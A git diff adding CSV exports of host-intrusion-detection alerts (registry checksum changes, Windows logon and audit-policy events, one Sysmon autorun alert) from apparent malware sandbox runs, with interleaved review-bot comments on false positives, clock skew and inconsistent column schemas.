+Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '595060ae771257ec03dd9741fec6cfd7' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'e5d103c64c3ec5b88f4f27f429c3b297a39c7d95' +", +"Apr 24, 2020 @ 13:17:41.088",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:16:38Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:17:34.918",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. 
+ +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:17:33.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'bec7923af911bc42900a4d74cc4d4af4' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: '5456e9d4456d03fb3f15c7ac02d91333683f3043' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", diff --git a/data/MW_15_HIDS_3.csv b/data/MW_15_HIDS_3.csv new file mode 100644 index 0000000..693fd41 --- /dev/null +++ b/data/MW_15_HIDS_3.csv 
@@ -0,0 +1,72 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 17:58:14.891",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '32d67903586d935a6926ee021a657f19' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '1ad1aa9999e1eafd661aa0303b51307310f5088f' +", +"May 22, 2020 @ 17:58:14.887",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '8999bd4a5ea0eeed0dd920d7e30ffee2' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : 'a08f01e683a5864c95f899a000531cacef39c721' +", +"May 22, 2020 @ 17:55:53.948",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:11.263 +ProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #0 +Details: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox 
--restore-last-session""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:11.276963800Z"",""eventRecordID"":""1191"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:11.263\r\nProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0\r\nDetails: C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:11.263"",""processGuid"":""{df9fc3d3-d0cd-5ec7-0000-001050a30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #0"",""details"":""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""}}}", +"May 22, 2020 @ 17:51:52.829",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. 
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 17:50:36.455",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 17:50:36.439",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 17:50:28.063",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '7a6925496501f6eab705d5c7ab038696' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '8bdc84c00ad75f8b65e6fa6eb585f0d689061628' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +", +"May 22, 2020 @ 17:50:28.047",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '15a74f51d7a0d4e1ac30c4b6d7d50bc1' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: '896016bfa429eaf3f1b7ca668d65033c1814feee' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +", +"May 22, 2020 @ 17:50:23.425",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", diff --git a/data/MW_15_NIDS.csv b/data/MW_15_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_15_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_16_HIDS_1.csv b/data/MW_16_HIDS_1.csv new file mode 100644 index 0000000..48b1160 --- /dev/null +++ b/data/MW_16_HIDS_1.csv 
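Review bot: The level-10 `ATT&CK T1060: Autorun Keys Modification` row in this hunk fires on `Image: C:\Windows\system32\csrss.exe` writing `RunOnce\Application Restart #0` with a Chrome `--restore-last-session` command line, which looks like the Windows Restart Manager re-launch entry rather than malware persistence, so if this alert is counted as a HIDS detection for sample 15 the dataset documentation should flag it as a probable false positive. The Kibana `timestamp` (`May 22, 2020 @ 17:55:53.948`) and the Sysmon `UtcTime: 2020-05-22 13:24:11.263` in the same row differ by roughly 4.5 hours, which is not a whole-hour zone offset, so the Sysmon `systemTime`/`UtcTime` field should be treated as the authoritative event time when correlating with the NIDS export. A README line such as `HIDS timestamp is Kibana ingestion time; use the Sysmon UtcTime/systemTime field for event ordering` would cover both points.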
@@ -0,0 +1,47 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 16:50:23.505",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '8da4aa4428657760c7c7976ad92a7c66' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : 'a69b3915170274813d5794c482763769bd34d6ac' +" +"Apr 4, 2020 @ 16:51:26.577",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0b017ce491fd1b22003082d2585a1327' +New md5sum is : '951ed48ea2b16a4b11a3e3fc66e0c792' +Old sha1sum was: 'aba803556e14ebf646bb03cbc539cb30b783ee41' +New sha1sum is : '91243c9a9bc671b7729496f2396ac68cf2ac6a62' +" +"Apr 4, 2020 @ 16:51:40.152",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 4, 2020 @ 16:51:40.171",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '1b931f57450117014d30c4469221616c' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : '065e9af055a9593fc198b9a9efaa6585d80b6af7' +" +"Apr 4, 2020 @ 16:51:49.904",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. 
+Old md5sum was: '6491bfbb48f449e8ef2da21bf4925908' +New md5sum is : '3fa199e01e6129043164b2e1c37f5861' +Old sha1sum was: 'a659aa851c1408487eefa829ad359673b7fb1288' +New sha1sum is : 'b4cfc18b446798b6de9db92885752e3473072b1c' +" +"Apr 4, 2020 @ 16:51:56.139",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'ebb35ca0e73314be0a05fef718b695c8' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'ba33045457fb2c2633c385785c496d0686356209' +" +"Apr 4, 2020 @ 16:51:56.184",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'ebb35ca0e73314be0a05fef718b695c8' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'ba33045457fb2c2633c385785c496d0686356209' +" +"Apr 4, 2020 @ 16:49:36.770",3,"Service startup type was changed", +"Apr 4, 2020 @ 16:49:40.569",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:50:39.101",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:50:45.523",3,"Software Protection service scheduled successfully", diff --git a/data/MW_16_HIDS_2.csv b/data/MW_16_HIDS_2.csv new file mode 100644 index 0000000..852f3ca --- /dev/null +++ b/data/MW_16_HIDS_2.csv 
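Review bot: MW_16_HIDS_1.csv is exported with a four-column header (`timestamp,"rule.level","rule.description","full_log"`) and rows in ascending time order, whereas MW_16_HIDS_2.csv in the next section carries five columns (adding `data.win.system.message`) and is sorted newest-first, so anything that concatenates the per-sample HIDS files will mis-align columns unless this is documented. The last four rows (`Service startup type was changed`, two `Windows Logon Success`, `Software Protection service scheduled successfully`) have an empty `full_log`, so the file records that a service startup type changed without saying which service. A README line such as `HIDS_1 exports use the 4-column schema and omit the event message body; HIDS_2/HIDS_3 exports add data.win.system.message` would tell consumers which exports carry detail.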
@@ -0,0 +1,325 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 14:30:18.236",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. 
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 14:30:17.951",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 14:30:02.393",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. 
+ +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 14:29:59.266",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +", +"Apr 24, 2020 @ 14:29:58.173",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '19bbf8dd71bfa5e2686e8f7a3a0c5ece' +New md5sum is : '02604b42c1e590131ad4f40243ac694b' +Old sha1sum was: 'ef9ff919614c4fcf38602f898935e4208334a11a' +New sha1sum is : '724609c5f9284f27c9cfdf841fb8717d1997fe89' +", +"Apr 24, 2020 @ 14:29:58.126",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. 
+Old md5sum was: 'ed31517f0fcd59fa85673f922c7ec847' +New md5sum is : '8776cf6928f2de374d1a329d7b0948c3' +Old sha1sum was: '8e81e810d1d5de5f44b40f278164e875506e3f8c' +New sha1sum is : '520ae6cd4e088c14c27c500ba09b18024715ec29' +", +"Apr 24, 2020 @ 14:24:23.579",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 14:24:23.549",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 14:23:24.085",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '061d54aa40bae3e7a2f3b77ac146174d' +New md5sum is : '6aa0b509739fb19b5c1aa45c92c254b4' +Old sha1sum was: 'f2ef7500df6b5fad5b6bc115b10a8a5c1c536bc7' +New sha1sum is : '76702d1ce5ed7ccc2f42da73a5e17382d356cf7d' +", +"Apr 24, 2020 @ 14:23:24.078",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4968ffe18e4fa8338000379b041f5f64' +New md5sum is : '9f4ba3c0f3cbcc2a7d50248db63158e2' +Old sha1sum was: 'b02420011da0733a46a9b58282e44f2e7727cde0' +New sha1sum is : 'b5fb4c1b7bb449e167b3422dc978466a999823a4' +", +"Apr 24, 2020 @ 14:22:25.169",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '7dac5cccd517440bbb43bbe2d5c7d13e' +New md5sum is : '19bbf8dd71bfa5e2686e8f7a3a0c5ece' +Old sha1sum was: '72aefb561ab27c0c761a2dd0fc41f9e6b6c997fa' +New sha1sum is : 'ef9ff919614c4fcf38602f898935e4208334a11a' +", +"Apr 24, 2020 @ 14:21:52.481",5,"The VSS service is shutting down due to idle timeout",,"""The VSS service is shutting down due to idle timeout. 
""" +"Apr 24, 2020 @ 14:20:00.011",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'b92c7d9f88a9158e5c71ec66ce922962' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '1a166cd1c6e9493122d34453abf15a7562755cd6' +", +"Apr 24, 2020 @ 14:19:59.997",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'b92c7d9f88a9158e5c71ec66ce922962' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '1a166cd1c6e9493122d34453abf15a7562755cd6' +", +"Apr 24, 2020 @ 14:19:54.902",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '6491bfbb48f449e8ef2da21bf4925908' +New md5sum is : 'a539c0e8e4591e4d2459734ef9aefeee' +Old sha1sum was: 'a659aa851c1408487eefa829ad359673b7fb1288' +New sha1sum is : '144fc561ab42d9ebac6c82647f7f6a6e130166b0' +", +"Apr 24, 2020 @ 14:19:46.484",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '061d54aa40bae3e7a2f3b77ac146174d' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : 'f2ef7500df6b5fad5b6bc115b10a8a5c1c536bc7' +", +"Apr 24, 2020 @ 14:19:46.395",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. 
+Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '4968ffe18e4fa8338000379b041f5f64' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'b02420011da0733a46a9b58282e44f2e7727cde0' +", +"Apr 24, 2020 @ 14:18:53.373",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. 
+ +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 14:18:45.984",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1476119 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 24, 2020 @ 14:18:45.671",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +", +"Apr 24, 2020 @ 14:18:44.514",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: 'c2187a169c3e384befba255a66ba663b' +New md5sum is : '7dac5cccd517440bbb43bbe2d5c7d13e' +Old sha1sum was: '55f8bf19c86868d25f922c70184c225fb00e4cc2' +New sha1sum is : '72aefb561ab27c0c761a2dd0fc41f9e6b6c997fa' +", +"Apr 24, 2020 @ 14:18:44.498",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : 'ed31517f0fcd59fa85673f922c7ec847' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : '8e81e810d1d5de5f44b40f278164e875506e3f8c' +", diff --git a/data/MW_16_HIDS_3.csv b/data/MW_16_HIDS_3.csv new file mode 100644 index 0000000..9c12517 --- /dev/null +++ b/data/MW_16_HIDS_3.csv 
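Review bot: The `Windows System error event` row at `Apr 24, 2020 @ 14:18:45.984` records that the time service found the system clock off by 1476119 seconds (about 17 days) and refused to correct it beyond 54000 seconds, so the VM ran the whole capture with a skewed clock; `timestamp` values in this export therefore cannot be matched to the NIDS export or to the sample's submission date without an offset, and this should be stated in the dataset documentation. The hunk also shows an FIM noise pattern worth documenting: `Services\BITS` flips between the same two checksums (`775174ea…` → `6a4fdf3a…` at 14:18:45, then `6a4fdf3a…` → `775174ea…` at 14:29:59) and `W32Time\SecureTimeLimits` changes on every run, which is most likely service start/stop churn rather than tampering, so level-7 integrity alerts on these keys should be treated as baseline when scoring detections. A README note such as `Sandbox clock skew of ~17 days present during the MW_16 run; HIDS timestamps are ingestion time` would let a consumer correct for it.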
